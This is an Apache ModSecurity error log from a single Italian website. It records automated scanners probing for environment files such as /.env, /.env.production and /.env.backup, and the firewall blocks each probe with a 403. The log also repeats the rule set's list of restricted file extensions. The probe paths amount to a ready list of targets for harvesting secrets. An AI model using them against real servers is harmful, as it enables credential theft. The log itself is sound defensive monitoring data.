[Sat Nov 29 01:24:51.989900 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSo9U1onenFtamV5yHYc-gAAAAI"]
[Sat Nov 29 01:50:00.025968 2025] [:error] [pid 396956] [client 45.139.104.171:39222] [client 45.139.104.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSpDOItKufSJfVuSdY3ixQAAAAo"]
[Sat Nov 29 01:50:00.026268 2025] [:error] [pid 396956] [client 45.139.104.171:39222] [client 45.139.104.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSpDOItKufSJfVuSdY3ixQAAAAo"]
[Sat Nov 29 01:50:00.026495 2025] [:error] [pid 396956] [client 45.139.104.171:39222] [client 45.139.104.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSpDOItKufSJfVuSdY3ixQAAAAo"]
[Sat Nov 29 05:39:30.224115 2025] [:error] [pid 398282] [client 3.96.137.215:60196] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSp5AnPPpSJHuVe2DcYaZAAAAAQ"]
[Sat Nov 29 05:39:30.224366 2025] [:error] [pid 398282] [client 3.96.137.215:60196] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSp5AnPPpSJHuVe2DcYaZAAAAAQ"]
[Sat Nov 29 05:39:30.224539 2025] [:error] [pid 398282] [client 3.96.137.215:60196] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSp5AnPPpSJHuVe2DcYaZAAAAAQ"]
[Sat Nov 29 05:39:30.399979 2025] [:error] [pid 398281] [client 3.96.137.215:60198] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSp5Apy0DGFOtoiLo6MjKwAAAAM"]
[Sat Nov 29 05:39:30.400217 2025] [:error] [pid 398281] [client 3.96.137.215:60198] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSp5Apy0DGFOtoiLo6MjKwAAAAM"]
[Sat Nov 29 05:39:30.400231 2025] [:error] [pid 398280] [client 3.96.137.215:60194] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSp5AkEtJ9CmhQWZAbNCWQAAAAI"]
[Sat Nov 29 05:39:30.400409 2025] [:error] [pid 398281] [client 3.96.137.215:60198] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSp5Apy0DGFOtoiLo6MjKwAAAAM"]
[Sat Nov 29 05:39:30.400415 2025] [:error] [pid 398280] [client 3.96.137.215:60194] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSp5AkEtJ9CmhQWZAbNCWQAAAAI"]
[Sat Nov 29 05:39:30.400581 2025] [:error] [pid 398280] [client 3.96.137.215:60194] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSp5AkEtJ9CmhQWZAbNCWQAAAAI"]
[Sat Nov 29 05:39:30.401775 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aSp5Ag31ShYAI8brU4C44gAAAAA"]
[Sat Nov 29 05:39:30.401932 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aSp5Ag31ShYAI8brU4C44gAAAAA"]
[Sat Nov 29 05:39:30.402318 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aSp5Ag31ShYAI8brU4C44gAAAAA"]
[Sat Nov 29 05:39:30.511469 2025] [:error] [pid 398580] [client 3.96.137.215:60200] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSp5At12Ktsqt9WK-U1YAQAAAA4"]
[Sat Nov 29 05:39:30.511693 2025] [:error] [pid 398580] [client 3.96.137.215:60200] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSp5At12Ktsqt9WK-U1YAQAAAA4"]
[Sat Nov 29 05:39:30.511896 2025] [:error] [pid 398580] [client 3.96.137.215:60200] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSp5At12Ktsqt9WK-U1YAQAAAA4"]
[Sat Nov 29 05:39:30.851209 2025] [:error] [pid 398279] [client 3.96.137.215:60272] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aSp5AmKHDrzsdxgeYEs7rQAAAAE"]
[Sat Nov 29 05:39:30.851521 2025] [:error] [pid 398279] [client 3.96.137.215:60272] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aSp5AmKHDrzsdxgeYEs7rQAAAAE"]
[Sat Nov 29 05:39:30.852545 2025] [:error] [pid 398279] [client 3.96.137.215:60272] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aSp5AmKHDrzsdxgeYEs7rQAAAAE"]
[Sat Nov 29 05:39:31.846200 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aSp5A9zvgQgSrnIGPhRUdgAAAAo"]
[Sat Nov 29 05:39:31.846465 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aSp5A9zvgQgSrnIGPhRUdgAAAAo"]
[Sat Nov 29 05:39:31.846639 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aSp5A9zvgQgSrnIGPhRUdgAAAAo"]
[Sat Nov 29 05:39:32.367823 2025] [:error] [pid 398579] [client 3.96.137.215:60386] [client 3.96.137.215] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aSp5BFCEJe2bvrm3rO_Z5QAAAA0"]
[Sat Nov 29 05:39:32.367993 2025] [:error] [pid 398579] [client 3.96.137.215:60386] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aSp5BFCEJe2bvrm3rO_Z5QAAAA0"]
[Sat Nov 29 05:39:32.368215 2025] [:error] [pid 398579] [client 3.96.137.215:60386] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aSp5BFCEJe2bvrm3rO_Z5QAAAA0"]
[Sat Nov 29 05:39:32.368396 2025] [:error] [pid 398579] [client 3.96.137.215:60386] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aSp5BFCEJe2bvrm3rO_Z5QAAAA0"]
[Sat Nov 29 05:39:32.953400 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSp5BPf8q--fJYmSMAuF9QAAAAk"]
[Sat Nov 29 05:39:32.953633 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSp5BPf8q--fJYmSMAuF9QAAAAk"]
[Sat Nov 29 05:39:32.953814 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSp5BPf8q--fJYmSMAuF9QAAAAk"]
[Sat Nov 29 05:39:33.111435 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSp5BQ31ShYAI8brU4C44wAAAAA"]
[Sat Nov 29 05:39:33.111656 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSp5BQ31ShYAI8brU4C44wAAAAA"]
[Sat Nov 29 05:39:33.111854 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSp5BQ31ShYAI8brU4C44wAAAAA"]
[Sat Nov 29 05:39:33.402632 2025] [:error] [pid 398572] [client 3.96.137.215:60540] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aSp5BVzUmGeGPC4NGsL9sQAAAAY"]
[Sat Nov 29 05:39:33.402869 2025] [:error] [pid 398572] [client 3.96.137.215:60540] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aSp5BVzUmGeGPC4NGsL9sQAAAAY"]
[Sat Nov 29 05:39:33.403053 2025] [:error] [pid 398572] [client 3.96.137.215:60540] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aSp5BVzUmGeGPC4NGsL9sQAAAAY"]
[Sat Nov 29 05:39:33.629822 2025] [:error] [pid 400364] [client 3.96.137.215:60792] [client 3.96.137.215] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSp5BYxM4Wj1FtUPgICrLwAAAAU"]
